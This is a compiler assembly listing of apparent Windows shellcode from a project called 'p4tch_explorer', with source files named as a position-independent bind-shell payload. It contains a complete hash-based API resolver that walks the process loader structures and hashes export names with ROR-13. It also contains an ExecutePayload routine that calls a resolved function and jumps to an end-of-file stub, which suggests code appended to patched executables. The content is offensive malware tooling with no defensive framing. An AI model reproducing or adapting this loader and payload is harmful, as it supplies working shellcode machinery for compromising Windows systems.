; Listing generated by Microsoft (R) Optimizing Compiler Version 17.00.50727.1 

include listing.inc

INCLUDELIB OLDNAMES

EXTRN	AlignRSP:PROC
EXTRN	jmp_end_of_file:PROC
PUBLIC	ExecutePayload
PUBLIC	InitialFuncs
PUBLIC	wrapper_jmp_end_of_file
PUBLIC	Begin
PUBLIC	GetProcAddressWithHash
;	COMDAT pdata
pdata	SEGMENT
$pdata$ExecutePayload DD imagerel $LN8
	DD	imagerel $LN8+35
	DD	imagerel $unwind$ExecutePayload
pdata	ENDS
;	COMDAT pdata
pdata	SEGMENT
$pdata$InitialFuncs DD imagerel $LN4
	DD	imagerel $LN4+56
	DD	imagerel $unwind$InitialFuncs
pdata	ENDS
;	COMDAT pdata
pdata	SEGMENT
$pdata$GetProcAddressWithHash DD imagerel $LN32
	DD	imagerel $LN32+249
	DD	imagerel $unwind$GetProcAddressWithHash
pdata	ENDS
;	COMDAT xdata
xdata	SEGMENT
$unwind$GetProcAddressWithHash DD 060f01H
	DD	05640fH
	DD	04340fH
	DD	0700b120fH
xdata	ENDS
;	COMDAT xdata
xdata	SEGMENT
$unwind$InitialFuncs DD 020601H
	DD	030023206H
xdata	ENDS
;	COMDAT xdata
xdata	SEGMENT
$unwind$ExecutePayload DD 010401H
	DD	04204H
xdata	ENDS
; Function compile flags: /Ogspy
;	COMDAT GetProcAddressWithHash
_TEXT	SEGMENT
BaseDllName$ = 0
dwModuleFunctionHash$ = 32
GetProcAddressWithHash PROC				; COMDAT
; File e:\sources\asm\p4tch_explorer\payload\pic_bindshell\pic_bindshell\getprocaddresswithhash.h
; Line 32
$LN32:
	mov	QWORD PTR [rsp+8], rbx
	mov	QWORD PTR [rsp+16], rsi
	push	rdi
	sub	rsp, 16
; Line 52
	mov	rax, QWORD PTR gs:96
	mov	esi, ecx
; Line 64
	mov	rdx, QWORD PTR [rax+24]
	mov	r9, QWORD PTR [rdx+16]
$LN5@GetProcAdd:
; Line 66
	mov	r8, QWORD PTR [r9+48]
	test	r8, r8
	je	$LN30@GetProcAdd
; Line 70
	movups	xmm0, XMMWORD PTR [r9+88]
; Line 71
	movsxd	rax, DWORD PTR [r8+60]
; Line 75
	mov	r9, QWORD PTR [r9]
	mov	ebx, DWORD PTR [rax+r8+136]
	xor	edx, edx
	movdqu	XMMWORD PTR BaseDllName$[rsp], xmm0
; Line 78
	test	ebx, ebx
	je	SHORT $LN5@GetProcAdd
; Line 84
	mov	rax, QWORD PTR BaseDllName$[rsp]
	shr	rax, 16
	movzx	r10d, ax
	test	r10d, r10d
	je	SHORT $LN10@GetProcAdd
	mov	rcx, QWORD PTR BaseDllName$[rsp+8]
	mov	r11d, r10d
$LL12@GetProcAdd:
; Line 88
	ror	edx, 13
; Line 90
	cmp	BYTE PTR [rcx], 97			; 00000061H
; Line 92
	movsx	eax, BYTE PTR [rcx]
	jl	SHORT $LN9@GetProcAdd
	add	edx, -32				; ffffffe0H
$LN9@GetProcAdd:
; Line 96
	add	edx, eax
	inc	rcx
	dec	r11
	jne	SHORT $LL12@GetProcAdd
$LN10@GetProcAdd:
; Line 100
	lea	r10, QWORD PTR [r8+rbx]
; Line 105
	xor	ecx, ecx
	mov	edi, DWORD PTR [r10+32]
	add	rdi, r8
	cmp	DWORD PTR [r10+24], ecx
	jbe	SHORT $LN5@GetProcAdd
$LL7@GetProcAdd:
; Line 108
	mov	ebx, DWORD PTR [rdi]
	xor	r11d, r11d
; Line 109
	lea	rdi, QWORD PTR [rdi+4]
	add	rbx, r8
$LL4@GetProcAdd:
; Line 116
	ror	r11d, 13
	movsx	eax, BYTE PTR [rbx]
; Line 117
	inc	rbx
	add	r11d, eax
; Line 118
	cmp	BYTE PTR [rbx-1], 0
	jne	SHORT $LL4@GetProcAdd
; Line 120
	lea	eax, DWORD PTR [r11+rdx]
; Line 122
	cmp	eax, esi
	je	SHORT $LN23@GetProcAdd
; Line 105
	inc	ecx
	cmp	ecx, DWORD PTR [r10+24]
	jb	SHORT $LL7@GetProcAdd
; Line 66
	jmp	$LN5@GetProcAdd
$LN23@GetProcAdd:
; Line 124
	mov	eax, DWORD PTR [r10+36]
	add	ecx, ecx
	add	rax, r8
; Line 125
	movzx	eax, WORD PTR [rcx+rax]
	mov	ecx, DWORD PTR [r10+28]
	shl	eax, 2
	cdqe
	add	rax, r8
	mov	eax, DWORD PTR [rcx+rax]
	add	rax, r8
	jmp	SHORT $LN16@GetProcAdd
$LN30@GetProcAdd:
; Line 131
	xor	eax, eax
$LN16@GetProcAdd:
; Line 132
	mov	rbx, QWORD PTR [rsp+32]
	mov	rsi, QWORD PTR [rsp+40]
	add	rsp, 16
	pop	rdi
	ret	0
GetProcAddressWithHash ENDP
_TEXT	ENDS
; Function compile flags: /Ogspy
;	COMDAT Begin
_TEXT	SEGMENT
Begin	PROC						; COMDAT
; File e:\sources\asm\p4tch_explorer\payload\pic_bindshell\pic_bindshell\64bithelper.h
; Line 12
	jmp	AlignRSP
Begin	ENDP
_TEXT	ENDS
; Function compile flags: /Ogspy
;	COMDAT wrapper_jmp_end_of_file
_TEXT	SEGMENT
wrapper_jmp_end_of_file PROC				; COMDAT
; File e:\sources\asm\p4tch_explorer\payload\pic_bindshell\pic_bindshell\64bithelper.h
; Line 15
	jmp	jmp_end_of_file
wrapper_jmp_end_of_file ENDP
_TEXT	ENDS
; Function compile flags: /Ogspy
;	COMDAT InitialFuncs
_TEXT	SEGMENT
pf$ = 48
InitialFuncs PROC					; COMDAT
; File e:\sources\asm\p4tch_explorer\payload\pic_bindshell\pic_bindshell\bindshell.c
; Line 21
$LN4:
	push	rbx
	sub	rsp, 32					; 00000020H
	mov	rbx, rcx
; Line 24
	mov	ecx, 119961420				; 0726774cH
	call	GetProcAddressWithHash
; Line 26
	mov	ecx, 123110213				; 07568345H
	mov	QWORD PTR [rbx], rax
	call	GetProcAddressWithHash
; Line 27
	mov	ecx, -533335996				; e035f044H
	mov	QWORD PTR [rbx+8], rax
	call	GetProcAddressWithHash
	mov	QWORD PTR [rbx+16], rax
; Line 30
	add	rsp, 32					; 00000020H
	pop	rbx
	ret	0
InitialFuncs ENDP
_TEXT	ENDS
; Function compile flags: /Ogspy
;	COMDAT ExecutePayload
_TEXT	SEGMENT
ExecutePayload PROC					; COMDAT
; File e:\sources\asm\p4tch_explorer\payload\pic_bindshell\pic_bindshell\bindshell.c
; Line 35
$LN8:
	sub	rsp, 40					; 00000028H
; Line 59
	mov	ecx, 123110213				; 07568345H
	call	GetProcAddressWithHash
; Line 60
	xor	r9d, r9d
	xor	r8d, r8d
	xor	edx, edx
	xor	ecx, ecx
	call	rax
; Line 108
	add	rsp, 40					; 00000028H
; Line 102
	jmp	jmp_end_of_file
ExecutePayload ENDP
_TEXT	ENDS
END
